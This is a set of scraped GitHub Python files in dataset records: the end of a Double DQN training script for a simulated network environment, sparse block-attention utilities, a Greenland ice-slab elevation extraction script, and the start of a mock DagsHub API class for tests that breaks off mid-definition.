self.recall()\n td_estimate = self.td_estimate(state, action)\n td_target = self.td_target(reward, next_state, done)\n loss = self.update_online(td_estimate, td_target)\n return td_estimate.mean().item(), loss.item()\n\n def run(self, num_episodes, threshold, interval=10):\n count = 0\n print('state_dim:', self.network.state_dim, 'action_dim: ', self.network.action_dim)\n self.score_history = list() \n self.avg_score_hisory = list() \n for i in range(num_episodes):\n done = False\n score = 0\n state = self.network.reset()\n\n while not done:\n action = self.act(state)\n next_state, reward, done, info = self.network.step(action)\n self.cache(state, action, reward, next_state, done)\n q, loss = self.learn()\n state = next_state\n score += reward\n\n self.score_history.append(score)\n avg_score = np.mean(self.score_history[-100:])\n self.avg_score_hisory.append(avg_score)\n if i % interval == 0:\n print('eipode ', i, 'epsilon ', self.epsilon, 'score %.2f average score %.2f' % (score, avg_score))\n count = count + 1 if avg_score >= threshold else 0\n if count > 100 and score >= threshold:\n self.save(score)\n break\n\n def plot(self, info='', save=True):\n plt.plot(self.avg_score_hisory)\n if save:\n plt.savefig(os.path.join(self.plot_dir, self.network.name+'-ddqn'+info+'.png'))\n plt.close()\n else:\n plt.show()\n\n def save(self, info):\n torch.save(self.net.state_dict(), os.path.join(self.save_dir, self.network.name+'-ddqn-'+str(info)+'.pt'))\n\ndef test(test_network):\n network = network_parser.parse(test_network)\n net = Net(network.state_dim, network.action_dim)\n net.load_state_dict(torch.load(os.path.join('saved_model', 'subnet-10-machine-30-service-6-v0-ddqn-277.pt')))\n net.eval()\n\n print('state_dim:', network.state_dim, 'action_dim: ', network.action_dim)\n num_episodes = 50\n interval = 5\n score_history = list()\n for i in range(num_episodes):\n done = False\n score = 0\n state = network.reset()\n \n while not done:\n state = torch.tensor(state)\n state = state.unsqueeze(0)\n action_values = net(state, model='online')\n action = torch.argmax(action_values, axis=1).item()\n\n # print(action)\n next_state, reward, done, info = network.step(action)\n state = next_state\n score += reward\n\n score_history.append(score)\n avg_score = np.mean(score_history[-100:])\n if i % interval == 0:\n print('eipode ', i, 'score %.2f average score %.2f' % (score, avg_score))\n\nif __name__ == '__main__':\n network = network_parser.parse('subnet-10-machine-30-service-6-v0.json')\n agent = DDQN(network, './plots', './saved_model')\n agent.run(2000, 0)\n agent.plot()\n # test('subnet-10-machine-30-service-6-v0.json')","repo_name":"ChangFu2000/Thesis","sub_path":"static/ddqn.py","file_name":"ddqn.py","file_ext":"py","file_size_in_byte":7213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"28494137486","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\ndevice = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n\n\n# MULTI HEAD SPARSE BLOCK ATTENTION UTILS\n\n\ndef torch_bmm_nd(inp_1, inp_2, ndim=None):\n \"\"\" Fast nd matrix multiplication \"\"\" \"\"\n return torch.bmm(\n inp_1.reshape((-1,) + inp_1.shape[-2:]), inp_2.reshape((-1,) + inp_2.shape[-2:])\n ).view(inp_1.shape[: ndim - 2] + (inp_1.shape[ndim - 2], inp_2.shape[ndim - 1]))\n\n\ndef torch_bmm_nd_transpose(inp_1, inp_2, ndim=None):\n \"\"\" Fast nd matrix multiplication with transpose \"\"\" \"\"\n return torch.bmm(\n inp_1.reshape((-1,) + inp_1.shape[-2:]),\n inp_2.reshape((-1,) + inp_2.shape[-2:]).transpose(1, 2),\n ).view(inp_1.shape[: ndim - 2] + (inp_1.shape[ndim - 2], inp_2.shape[ndim - 2]))\n\n\ndef get_random_mask_with_heads(\n sequence_length: int,\n num_heads: int,\n blocked_mask,\n indexes,\n block_size: int,\n nr: int,\n batch_size: int,\n):\n bm = (\n blocked_mask.unsqueeze(-1)\n .unsqueeze(-1)\n .unsqueeze(1)\n .expand(-1, num_heads, -1, -1, 1, nr)\n .transpose(-1, -3)\n .view(batch_size, num_heads, sequence_length // block_size, nr, block_size)\n )\n\n random_mask = (\n indexes.unsqueeze(0)\n .unsqueeze(-1)\n .expand(batch_size, num_heads, -1, -1, block_size)\n )\n # print(random_mask.shape, bm.shape)\n random_mask = torch.gather(bm, 2, random_mask)\n return torch.einsum(\n \"blq,bhlk->bhlqk\",\n blocked_mask[:, 1:-1],\n random_mask.view(\n batch_size, num_heads, sequence_length // block_size - 2, block_size * nr\n ),\n )\n\ndef blockify_with_heads(\n x, batch_size: int, num_heads: int, sequence_length: int, block_size: int\n):\n \"\"\"\n block_length: sequence_length // block_size\n \"\"\"\n return x.reshape(\n batch_size, num_heads, sequence_length // block_size, block_size, -1\n )\n\ndef get_random_attention_indexes_with_heads(\n sequence_length: int,\n num_heads: int,\n block_size: int,\n num_random: int,\n num_neighbours: int = 3,\n margin: int = 1,\n):\n \"\"\"\n Selects random IDs for each row\n Output: Tensor, with IDs\n \"\"\"\n assert num_neighbours == 3, \"Not Implemented\"\n bl = sequence_length // block_size\n di = np.diag_indices(bl, ndim=1)\n\n illegal_indices = np.concatenate(\n [\n np.zeros([1, bl]),\n di,\n np.roll(di, shift=-1),\n np.roll(di, shift=1),\n np.full([1, bl], bl - 1),\n ]\n ).transpose(-1, -2)\n\n def h(x, rn):\n return np.random.choice(\n [i for i in range(0, sequence_length // block_size) if i not in x],\n rn,\n replace=False,\n )\n\n res = []\n for _ in range(num_heads):\n res.append(\n np.apply_along_axis(h, 1, illegal_indices, rn=num_random)[margin:-margin]\n )\n\n return torch.LongTensor(np.stack(res, 0))\n\n\ndef get_gathered_indexes_with_heads(\n indexes,\n num_heads: int,\n batch_size: int,\n sequence_length: int,\n block_size: int,\n rn: int,\n hidden_size: int,\n):\n \"\"\"\n Map for random blocks\n Args:\n indexes: Tensor, with block_ids\n \"\"\"\n assert indexes.shape[0] == num_heads, \"Wrong number of heads\"\n head_indexes = []\n for h in range(num_heads):\n head_indexes.append(\n get_gathered_indexes(\n indexes[h],\n batch_size=batch_size,\n sequence_length=sequence_length,\n block_size=block_size,\n hidden_size=hidden_size // num_heads,\n rn=rn,\n )\n )\n\n return torch.stack(head_indexes, 1)\n\n\n# SINGLE HEAD SPARSE BLOCK ATTENTION UTILS\n\n\ndef get_random_attention_indexes(\n sequence_length: int,\n block_size: int,\n num_random: int,\n num_neighbours: int = 3,\n margin: int = 1,\n):\n \"\"\"\n Selects random IDs for each row\n Output: Tensor, with IDs\n \"\"\"\n assert num_random < 3 and num_random >= 1, \"Not Implemented\"\n assert num_neighbours == 3, \"Not Implemented\"\n assert (\n sequence_length // block_size - 1 - num_neighbours > num_random\n ), \"Number of random blocks is too large\"\n\n bl = sequence_length // block_size\n di = np.diag_indices(bl, ndim=1)\n illegal_indices = np.concatenate(\n [\n np.zeros([1, bl]),\n di,\n np.roll(di, shift=-1),\n np.roll(di, shift=1),\n np.full([1, bl], bl - 1),\n ]\n ).transpose(-1, -2)\n\n def h(x, rn):\n return np.random.choice(\n [i for i in range(0, sequence_length // block_size) if i not in x],\n rn,\n replace=False,\n )\n\n # , illegal_indices[margin:-margin]\n return torch.LongTensor(\n np.apply_along_axis(h, 1, illegal_indices, rn=num_random)[margin:-margin]\n )\n\n\n@torch.jit.script\ndef get_gathered_indexes(\n indexes,\n batch_size: int,\n sequence_length: int,\n block_size: int,\n rn: int,\n hidden_size: int,\n):\n \"\"\"\n Map for random blocks\n Args:\n indexes: Tensor, with block_ids\n \"\"\"\n return (\n indexes.unsqueeze(0)\n .unsqueeze(-1)\n .expand(batch_size, -1, rn, block_size)\n .reshape(batch_size, -1, block_size * rn)\n .unsqueeze(-1)\n .expand(-1, -1, -1, hidden_size)\n .reshape(batch_size, -1, block_size, hidden_size)\n )\n\n\n@torch.jit.script\ndef get_random_mask(\n sequence_length: int,\n blocked_mask,\n indexes,\n block_size: int,\n nr: int,\n batch_size: int,\n):\n bm = (\n blocked_mask.unsqueeze(-1)\n .unsqueeze(-1)\n .expand(-1, -1, -1, 1, nr)\n .transpose(-1, -3)\n .view(batch_size, sequence_length // block_size, nr, block_size)\n )\n random_mask = (\n indexes.unsqueeze(0).unsqueeze(-1).expand(batch_size, -1, -1, block_size)\n )\n random_mask = torch.gather(bm, 1, random_mask)\n return torch.einsum(\n \"blq,blk->blqk\",\n blocked_mask[:, 1:-1],\n random_mask.view(\n batch_size, sequence_length // block_size - 2, block_size * nr\n ),\n )\n\n\n@torch.jit.script\ndef get_padding_mask(x, padding_token: int = 0):\n return (x == padding_token).long()\n\n\n@torch.jit.script\ndef get_padding2attention_mask(padding_mask):\n mask = torch.einsum(\"bf,bt->bft\", padding_mask, padding_mask)\n # Create 2D attention mask\n return torch.unsqueeze(mask, 1)\n\n\n@torch.jit.script\ndef get_band_mask(blocked_mask):\n \"\"\"Create 3D attention mask from a 2D tensor mask.\n Args:\n blocked_mask: 2D Tensor of shape [batch_size, from_seq_length//from_block_size, from_block_size].\n Returns:\n float Tensor of shape [batch_size, 1, from_seq_length//from_block_size-4,\n block_size, 3*to_block_size].\n \"\"\"\n\n exp_blocked_to_pad = torch.cat(\n [blocked_mask[:, 1:-3], blocked_mask[:, 2:-2], blocked_mask[:, 3:-1]], 2\n )\n band_mask = torch.einsum(\n \"blq,blk->blqk\", blocked_mask[:, 2:-2], exp_blocked_to_pad\n ).unsqueeze(1)\n return band_mask\n\n\n@torch.jit.script\ndef blockify(x, batch_size: int, block_length: int, block_size: int):\n \"\"\"\n block_length: sequence_length // block_size\n \"\"\"\n return x.reshape(batch_size, block_length, block_size, -1)\n\n\ndef simulate_sparse_mask(sequence_length, block_size, rand_attn):\n r = np.kron(\n np.diag(np.ones(sequence_length // block_size)),\n np.ones((block_size, block_size), dtype=\"int\"),\n )\n r = torch.LongTensor(r)\n r = torch.max(r, torch.roll(r, block_size, 1))\n r = torch.max(r, torch.roll(r, -block_size, 1))\n r[:, :block_size] = 1\n r[:, -block_size:] = 1\n r[:block_size, :] = 1\n r[-block_size:, :] = 1\n ind = torch.LongTensor(range(1, sequence_length // block_size - 1))\n r = (\n torch.LongTensor(r)\n .view(\n sequence_length // block_size,\n block_size,\n sequence_length // block_size,\n block_size,\n )\n .permute(0, 2, 1, -1)\n .transpose(-1, -2)\n )\n for i in range(rand_attn.shape[1]):\n r[ind, rand_attn[:, i]] = 1\n\n return (\n r.transpose(-1, -2).permute(0, 2, 1, 3).view(sequence_length, sequence_length)\n )\n","repo_name":"SocialComplexityLab/life2vec","sub_path":"src/transformer/att_utils.py","file_name":"att_utils.py","file_ext":"py","file_size_in_byte":8309,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"19"} +{"seq_id":"73085344682","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 2 16:33:27 2022\n@author: jullienn\n\"\"\"\n#Import packages\nimport geopandas as gpd # Requires the pyshp package\nimport pickle\nimport numpy as np\nimport pandas as pd\nfrom shapely.geometry import Point, Polygon\nfrom pyproj import Transformer\nimport pdb\nimport cartopy.crs as ccrs\nimport matplotlib.pyplot as plt\n\n### -------------------------- Load GrIS DEM ----------------------------- ###\n#https://towardsdatascience.com/reading-and-visualizing-geotiff-images-with-python-8dcca7a74510\nimport rasterio\nfrom rasterio.plot import show\n\n#Choose high end or low end\ndataset_type='high'\nprint('Processing dataset:',dataset_type)\n#Define path\npath='C:/Users/jullienn/switchdrive/Private/research/RT1/final_dataset_2002_2018/'\n\npath_GrIS_DEM = r'C:/Users/jullienn/switchdrive/Private/research/backup_Aglaja/working_environment/greenland_topo_data/elevations/greenland_dem_mosaic_100m_v3.0.tif'\nGrIS_DEM = rasterio.open(path_GrIS_DEM)\n### -------------------------- Load GrIS DEM ----------------------------- ###\n\n### -------------------------- Load shapefiles --------------------------- ###\n#from https://gis.stackexchange.com/questions/113799/how-to-read-a-shapefile-in-python\n#Load Rignot et al., 2016 Greenland drainage bassins\npath_rignotetal2016_GrIS_drainage_bassins='C:/Users/jullienn/switchdrive/Private/research/backup_Aglaja/working_environment/greenland_topo_data/GRE_Basins_IMBIE2_v1.3/'\nGrIS_drainage_bassins=gpd.read_file(path_rignotetal2016_GrIS_drainage_bassins+'GRE_Basins_IMBIE2_v1.3_EPSG_3413.shp',rows=slice(51,57,1)) #the regions are the last rows of the shapefile\n#Extract indiv regions and create related indiv shapefiles\nNO_rignotetal=GrIS_drainage_bassins[GrIS_drainage_bassins.SUBREGION1=='NO']\nNE_rignotetal=GrIS_drainage_bassins[GrIS_drainage_bassins.SUBREGION1=='NE']\nSE_rignotetal=GrIS_drainage_bassins[GrIS_drainage_bassins.SUBREGION1=='SE']\nSW_rignotetal=GrIS_drainage_bassins[GrIS_drainage_bassins.SUBREGION1=='SW']\nCW_rignotetal=GrIS_drainage_bassins[GrIS_drainage_bassins.SUBREGION1=='CW']\nNW_rignotetal=GrIS_drainage_bassins[GrIS_drainage_bassins.SUBREGION1=='NW']\n\n#Load Rignot et al., 2016 GrIS mask\npath_rignotetal2016_GrIS='C:/Users/jullienn/switchdrive/Private/research/backup_Aglaja/working_environment/greenland_topo_data/GRE_IceSheet_IMBIE2/GRE_IceSheet_IMBIE2/'\nGrIS_rignotetal2016=gpd.read_file(path_rignotetal2016_GrIS+'GRE_IceSheet_IMBIE2_v1_EPSG3413.shp',rows=slice(1,2,1)) #the regions are the last rows of the shapefile\nGrIS_mask=GrIS_rignotetal2016[GrIS_rignotetal2016.SUBREGION1=='ICE_SHEET']\n### -------------------------- Load shapefiles --------------------------- ###\n\n### ---------------- Load 2002-2003 ice lenses location ------------------ ###\npath_data='C:/Users/jullienn/Documents/working_environment/iceslabs_MacFerrin/icelens_identification'\n \n#Open the file and read it\nf_icelens_flightlines = open(path_data+'/metadata_coord_icelens_2002_2003_26022020', \"rb\")\nicelens_2002_3_flightlines = pickle.load(f_icelens_flightlines)\nf_icelens_flightlines.close()\n\nlat_icelens=[]\nlon_icelens=[]\ncolorcode_icelens=[]\nTrack_name=[]\n\nfor year in list(icelens_2002_3_flightlines.keys()):\n for days in list(icelens_2002_3_flightlines[year].keys()):\n for indiv_file in list(icelens_2002_3_flightlines[year][days].keys()):\n print(indiv_file)\n if (indiv_file[0:7]=='quality'):\n print('Quality file, continue')\n continue\n elif (not(bool(icelens_2002_3_flightlines[year][days][indiv_file]))):\n print('No ice lens, continue')\n continue\n else:\n lat_icelens=np.append(lat_icelens,icelens_2002_3_flightlines[year][days][indiv_file][0])\n lon_icelens=np.append(lon_icelens,icelens_2002_3_flightlines[year][days][indiv_file][1])\n colorcode_icelens=np.append(colorcode_icelens,icelens_2002_3_flightlines[year][days][indiv_file][2])\n #Create an empty vector of strings\n Track_name=np.append(Track_name,[indiv_file for x in range(0,len(icelens_2002_3_flightlines[year][days][indiv_file][0]))])\n\n#Create a dataframe out of it\ndf_2002_2003=pd.DataFrame(lat_icelens, columns =['lat_3413'])\ndf_2002_2003['lon_3413']=lon_icelens\ndf_2002_2003['colorcode_icelens']=colorcode_icelens\ndf_2002_2003['Track_name']=Track_name\n### ---------------- Load 2002-2003 ice lenses location ------------------ ###\n\n### --------------------- Load 2010-2018 ice slabs ----------------------- ###\ncsv_name=dataset_type+'_estimate'\n#Load the data\n#filename_20102018=path+'final_excel/dataset_for_Fig3/Ice_Layer_Output_Thicknesses_2010_2018_jullienetal2021_Fig3_'+csv_name+'.csv'#For Fig3\nfilename_20102018=path+'final_excel/'+csv_name+'/Ice_Layer_Output_Thicknesses_2010_2018_jullienetal2021_'+csv_name+'.csv'\ndf_20102018 = pd.read_csv(filename_20102018, sep=\",\", decimal='.')\n'''\n#Load the data !for RT3!\nfilename_20102018='C:/Users/jullienn/switchdrive/Private/research/RT3/export_RT1_for_RT3/Ice_Layer_Output_Thicknesses_Likelihood_2010_2018_jullienetal2021_for_RT3_masked.csv'\ndf_20102018 = pd.read_csv(filename_20102018, sep=\",\", decimal='.')\n'''\n#Transform the coordinated from WGS84 to EPSG:3413\n#Example from: https://pyproj4.github.io/pyproj/stable/examples.html\ntransformer = Transformer.from_crs(\"EPSG:4326\", \"EPSG:3413\", always_xy=True)\npoints=transformer.transform(np.array(df_20102018.lon),np.array(df_20102018.lat))\n\n#Store lat/lon 3413\ndf_20102018['lat_3413']=points[1]\ndf_20102018['lon_3413']=points[0]\n### --------------------- Load 2010-2018 ice slabs ----------------------- ###\n\n### --------------------- Load 2010-2018 shapefile ----------------------- ###\n#Define path\nshapefile_name=dataset_type+'end'\npath_shapefile=path+'shapefiles/iceslabs_jullien_'+shapefile_name+'_20102018.shp'\ndf_20102018_shapefile = gpd.read_file(path_shapefile)\n### --------------------- Load 2010-2018 shapefile ----------------------- ###\n\n### --- Clip data with shapefile to get rid of too low elevations points --- ###\nprint('--- Clip 2010-2018 data to shapefile ---')\n#This is from Fig. 1\ndf_20102018['coords'] = list(zip(df_20102018['lon_3413'],df_20102018['lat_3413']))\ndf_20102018['coords'] = df_20102018['coords'].apply(Point)\npoints = gpd.GeoDataFrame(df_20102018, geometry='coords', crs=\"EPSG:3413\")\ndf_20102018_clipped = gpd.tools.sjoin(points, df_20102018_shapefile, predicate=\"within\", how='left') #This is from https://www.matecdev.com/posts/point-in-polygon.html\n\n#Drop duplicates (some points might belong to two regions at borders)\ndf_20102018_clipped['indexes'] = df_20102018_clipped.index\ndf_20102018_clipped_dropped = df_20102018_clipped.drop_duplicates(subset='indexes',keep='first')\ndf_20102018_clipped_dropped = df_20102018_clipped_dropped[~pd.isna(df_20102018_clipped_dropped.region)]\n### --- Clip data with shapefile to get rid of too low elevations points --- ###\n\n### -------------------- Save 2010-2018 clipped data ---------------------- ###\n#filename_tosave=path+'final_excel/dataset_for_Fig3/clipped/Ice_Layer_Output_Thicknesses_2010_2018_jullienetal2021_Fig3_'+csv_name+'_cleaned.csv'#For Fig3\nfilename_tosave=path+'final_excel/'+csv_name+'/clipped/Ice_Layer_Output_Thicknesses_2010_2018_jullienetal2021_'+csv_name+'_cleaned.csv'\ndf_20102018_clipped_dropped.to_csv(filename_tosave,columns=['Track_name', 'Tracenumber', 'lat', 'lon', 'alongtrack_distance_m','20m_ice_content_m', 'likelihood'])\n### -------------------- Save 2010-2018 clipped data ---------------------- ###\nprint('--- Done clip 2010-2018 data to shapefile ---')\n\n#Drop useless columns\ndf_20102018_clipped_dropped=df_20102018_clipped_dropped.drop(columns=['coords','index_right','id','region','indexes'])\n\n#Initialise the elevation and shapefile belonging column\ndf_20102018_clipped_dropped['key_shp']=np.nan\ndf_20102018_clipped_dropped['elevation']=np.nan\ndf_20102018_clipped_dropped['year']=np.nan\n\n#Make sure what we did is correct\ncrs = ccrs.NorthPolarStereo(central_longitude=-45., true_scale_latitude=70.) \nfig = plt.figure()\nax1 = plt.subplot(projection=crs)\ndf_20102018_shapefile.plot(ax=ax1,color='#d73027', edgecolor='none',linewidth=0.5)\nax1.scatter(df_20102018['lon_3413'],df_20102018['lat_3413'],s=2,c='blue')\nax1.scatter(df_20102018_clipped_dropped['lon_3413'],df_20102018_clipped_dropped['lat_3413'],s=1,c='green')\nplt.close()\n\nprint('--- Extract elevation ---')\n### ----------- Extract elevation and region for 2010-2018 --------------- ###\n#This part of code is from 'refine_location_2017_2018.py'\n#Loop over all data point to check whether it belongs to one of the four shapefile\nfor i in df_20102018_clipped_dropped.index:\n #select the point i\n single_point=Point(df_20102018_clipped_dropped.loc[i,'lon_3413'],df_20102018_clipped_dropped.loc[i,'lat_3413'])\n \n #Do the identification between the point i and the regional shapefiles\n #From: https://automating-gis-processes.github.io/CSC18/lessons/L4/point-in-polygon.html\n check_NO_rignotetal=np.asarray(NO_rignotetal.contains(single_point)).astype(int)\n check_NE_rignotetal=np.asarray(NE_rignotetal.contains(single_point)).astype(int)\n check_SE_rignotetal=np.asarray(SE_rignotetal.contains(single_point)).astype(int)\n check_SW_rignotetal=np.asarray(SW_rignotetal.contains(single_point)).astype(int)\n check_CW_rignotetal=np.asarray(CW_rignotetal.contains(single_point)).astype(int)\n check_NW_rignotetal=np.asarray(NW_rignotetal.contains(single_point)).astype(int)\n\n #Associated the point of interest to its regional shapefile in data_iceslabs\n #New way of assigning value in the dataframe to get rid of the warning. This was done thanks to Peter Mortensen's reply in https://stackoverflow.com/questions/20625582/how-to-deal-with-settingwithcopywarning-in-pandas.\n if (np.sum(check_NO_rignotetal)>0):\n df_20102018_clipped_dropped.loc[i,'key_shp']='NO'\n elif (np.sum(check_NE_rignotetal)>0):\n df_20102018_clipped_dropped.loc[i,'key_shp']='NE'\n elif (np.sum(check_SE_rignotetal)>0):\n df_20102018_clipped_dropped.loc[i,'key_shp']='SE'\n elif (np.sum(check_SW_rignotetal)>0):\n df_20102018_clipped_dropped.loc[i,'key_shp']='SW'\n elif (np.sum(check_CW_rignotetal)>0):\n df_20102018_clipped_dropped.loc[i,'key_shp']='CW'\n elif (np.sum(check_NW_rignotetal)>0):\n df_20102018_clipped_dropped.loc[i,'key_shp']='NW'\n else:\n df_20102018_clipped_dropped.loc[i,'key_shp']='Out'\n \n #Add the year\n df_20102018_clipped_dropped.loc[i,'year']=int(df_20102018_clipped_dropped.loc[i,'Track_name'][0:4])\n \n #Calcul elevation\n if (np.isnan(df_20102018_clipped_dropped.loc[i,'lon_3413'])):\n continue\n \n #This is from https://gis.stackexchange.com/questions/190423/getting-pixel-values-at-single-point-using-rasterio\n for val in GrIS_DEM.sample([(df_20102018_clipped_dropped.loc[i,'lon_3413'], df_20102018_clipped_dropped.loc[i,'lat_3413'])]): \n #Calculate the corresponding elevation\n df_20102018_clipped_dropped.loc[i,'elevation']=val\n \n #Monitor the process\n if ((i % 1000)==0): #from https://stackoverflow.com/questions/13150417/python-multiple-of-10-if-statement\n print(np.round(i/df_20102018.shape[0]*100,3),'%')\n\n#Save the dictionary into a picke file\n'''\n#For RT3!\nfilename_tosave='C:/Users/jullienn/switchdrive/Private/research/RT3/export_RT1_for_RT3/df_20102018_with_elevation_for_RT3_masked_rignotetalregions'\n'''\n#filename_tosave='C:/Users/jullienn/switchdrive/Private/research/RT1/final_dataset_2002_2018/final_excel/dataset_for_Fig3/clipped/df_20102018_with_elevation_Fig3_'+csv_name+'_rignotetalregions_cleaned'#For Fig3\nfilename_tosave='C:/Users/jullienn/switchdrive/Private/research/RT1/final_dataset_2002_2018/final_excel/'+csv_name+'/clipped/df_20102018_with_elevation_'+csv_name+'_rignotetalregions_cleaned'\n\noutfile= open(filename_tosave, \"wb\" )\npickle.dump(df_20102018_clipped_dropped,outfile)\noutfile.close()\n### ----------- Extract elevation and region for 2010-2018 --------------- ###\nprint('--- Done in extract elevation ---')\n\npdb.set_trace()\n\n### ----------- Extract elevation and region for 2002-2003 --------------- ###\n#Initialise the shapefile belonging column\ndf_2002_2003['key_shp']=np.nan\ndf_2002_2003['elevation']=np.nan\ndf_2002_2003['year']=np.nan\n\n#This part of code is from 'refine_location_2017_2018.py'\n#Loop over all data point to check whether it belongs to one of the four shapefile\nfor i in range(0,len(df_2002_2003)):\n #select the point i\n single_point=Point(df_2002_2003['lon_3413'].iloc[i],df_2002_2003['lat_3413'].iloc[i])\n \n #Do the identification between the point i and the regional shapefiles\n #From: https://automating-gis-processes.github.io/CSC18/lessons/L4/point-in-polygon.html\n check_NO_rignotetal=np.asarray(NO_rignotetal.contains(single_point)).astype(int)\n check_NE_rignotetal=np.asarray(NE_rignotetal.contains(single_point)).astype(int)\n check_SE_rignotetal=np.asarray(SE_rignotetal.contains(single_point)).astype(int)\n check_SW_rignotetal=np.asarray(SW_rignotetal.contains(single_point)).astype(int)\n check_CW_rignotetal=np.asarray(CW_rignotetal.contains(single_point)).astype(int)\n check_NW_rignotetal=np.asarray(NW_rignotetal.contains(single_point)).astype(int)\n \n #Associated the point of interest to its regional shapefile in data_iceslabs\n if (np.sum(check_NO_rignotetal)>0):\n df_2002_2003['key_shp'].iloc[i]='NO'\n elif (np.sum(check_NE_rignotetal)>0):\n df_2002_2003['key_shp'].iloc[i]='NE'\n elif (np.sum(check_SE_rignotetal)>0):\n df_2002_2003['key_shp'].iloc[i]='SE'\n elif (np.sum(check_SW_rignotetal)>0):\n df_2002_2003['key_shp'].iloc[i]='SW'\n elif (np.sum(check_CW_rignotetal)>0):\n df_2002_2003['key_shp'].iloc[i]='CW'\n elif (np.sum(check_NW_rignotetal)>0):\n df_2002_2003['key_shp'].iloc[i]='NW'\n else:\n df_2002_2003['key_shp'].iloc[i]='Out'\n \n #Add the year\n if (df_2002_2003['Track_name'].iloc[i][6:8] == '02'):\n year_to_write=2002\n elif (df_2002_2003['Track_name'].iloc[i][6:8] == '03'):\n year_to_write=2003\n else:\n print('Year not known, error')\n break\n df_2002_2003['year'].iloc[i]=year_to_write\n \n #Calcul elevation\n if (np.isnan(df_2002_2003['lon_3413'].iloc[i])):\n continue\n \n #This is from https://gis.stackexchange.com/questions/190423/getting-pixel-values-at-single-point-using-rasterio\n for val in GrIS_DEM.sample([(df_2002_2003['lon_3413'].iloc[i], df_2002_2003['lat_3413'].iloc[i])]): \n #Calculate the corresponding elevation\n df_2002_2003['elevation'].iloc[i]=val\n \n #Monitor the process\n print(i/len(df_2002_2003)*100,'%')\n\n#Only work with green slabs\ndf_2002_2003_green=df_2002_2003[df_2002_2003['colorcode_icelens']==1]\n\n#Save the dictionary into a picke file\nfilename_tosave='C:/Users/jullienn/switchdrive/Private/research/RT1/final_dataset_2002_2018/df_2002_2003_with_elevation_rignotetalregions'\noutfile= open(filename_tosave, \"wb\" )\npickle.dump(df_2002_2003,outfile)\noutfile.close()","repo_name":"jullienn/changing_Greenland_iceslabs","sub_path":"src/extract_elevation.py","file_name":"extract_elevation.py","file_ext":"py","file_size_in_byte":15132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"23951432269","text":"import os.path\n\nfrom httpx import Response\nfrom respx import MockRouter, Route\n\n\nclass MockApi(MockRouter):\n def __init__(self, git_repo, user=\"user\", reponame=\"repo\", *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.user = user\n self.reponame = reponame\n self.git_repo = git_repo\n\n self.storage_bucket_path = \"storage-bucket/prefix\"\n\n self._endpoints, self._responses = self._default_endpoints_and_responses()\n route_dict = {\n k: (self._endpoints[k], self._responses[k]) for k in self._endpoints\n }\n for route_name in route_dict:\n endpoint_regex, return_value = route_dict[route_name]\n self.route(name=route_name, url__regex=endpoint_regex).mock(return_value)\n\n @property\n def repourlpath(self):\n return f\"{self.user}/{self.reponame}\"\n\n @property\n def repoapipath(self):\n return f\"/api/v1/repos/{self.repourlpath}\"\n\n @property\n def repophysicalpath(self):\n return str(self.git_repo.workspace)\n\n @property\n def current_revision(self):\n heads = self.git_repo.api.heads\n if \"main\" in heads:\n return heads.main.commit.hexsha\n else:\n return heads.master.commit.hexsha\n\n def api_list_path(self, branch=None):\n if branch is None:\n branch = self.current_revision\n return f\"{self.repoapipath}/content/{branch}\"\n\n def api_raw_path(self, branch=None):\n if branch is None:\n branch = self.current_revision\n return f\"{self.repoapipath}/raw/{branch}\"\n\n @property\n def api_storage_list_path(self):\n return f\"{self.repoapipath}/storage/content/s3/{self.storage_bucket_path}\"\n\n @property\n def api_storage_raw_path(self):\n return f\"{self.repoapipath}/storage/raw/s3/{self.storage_bucket_path}\"\n\n def _default_endpoints_and_responses(self):\n endpoints = {\n \"repo\": rf\"{self.repoapipath}/?$\",\n \"branch\": rf\"{self.repoapipath}/branches/(main|master)$\",\n \"branches\": rf\"{self.repoapipath}/branches/?$\",\n \"list_root\": rf\"{self.repoapipath}/content/{self.current_revision}/$\",\n \"storages\": rf\"{self.repoapipath}/storage/?$\"\n }\n\n responses = {\n \"repo\": Response(\n 200,\n json={\n \"id\": 713,\n \"owner\": {\n \"id\": 736,\n \"login\": self.user,\n \"full_name\": self.user,\n \"avatar_url\": \"https://dagshub.com/avatars/736\",\n \"username\": self.user,\n },\n \"name\": self.reponame,\n \"full_name\": self.repourlpath,\n \"description\": \"Open Source Data Science (OSDS) Monocular Depth Estimation \"\n \"– Turn 2d photos into 3d photos – show your grandma the awesome results.\",\n \"private\": False,\n \"fork\": False,\n \"parent\": None,\n \"empty\": False,\n \"mirror\": False,\n \"size\": 19987456,\n \"html_url\": f\"https://dagshub.com/{self.repourlpath}\",\n \"clone_url\": f\"https://dagshub.com/{self.repourlpath}.git\",\n \"website\": \"\",\n \"stars_count\": 12,\n \"forks_count\": 25,\n \"watchers_count\": 5,\n \"open_issues_count\": 6,\n \"default_branch\": \"main\",\n \"created_at\": \"2020-08-02T15:19:07Z\",\n \"updated_at\": \"2023-02-01T16:06:44Z\",\n \"permissions\": {\"admin\": False, \"push\": False, \"pull\": False},\n },\n ),\n \"branch\": Response(\n 200,\n json={\n \"name\": \"main\",\n \"commit\": {\n \"id\": self.current_revision,\n \"message\": \"Update 'README.md'\\n\",\n \"url\": \"\",\n \"author\": {\n \"name\": \"dagshub\",\n \"email\": \"info@dagshub.com\",\n \"username\": \"\",\n },\n \"committer\": {\n \"name\": \"dagshub\",\n \"email\": \"info@dagshub.com\",\n \"username\": \"\",\n },\n \"added\": None,\n \"removed\": None,\n \"modified\": None,\n \"timestamp\": \"2021-08-10T09:03:32Z\",\n },\n },\n ),\n \"branches\": Response(\n 200,\n json=[\n {\n \"name\": \"main\",\n \"commit\": {\n \"id\": self.current_revision,\n \"message\": \"Update 'README.md'\\n\",\n \"url\": \"\",\n \"author\": {\n \"name\": \"dagshub\",\n \"email\": \"info@dagshub.com\",\n \"username\": \"\",\n },\n \"committer\": {\n \"name\": \"dagshub\",\n \"email\": \"info@dagshub.com\",\n \"username\": \"\",\n },\n \"added\": None,\n \"removed\": None,\n \"modified\": None,\n \"timestamp\": \"2021-08-10T09:03:32Z\",\n },\n }\n ],\n ),\n \"list_root\": Response(\n 200,\n json=[\n {\n \"path\": \"a.txt\",\n \"type\": 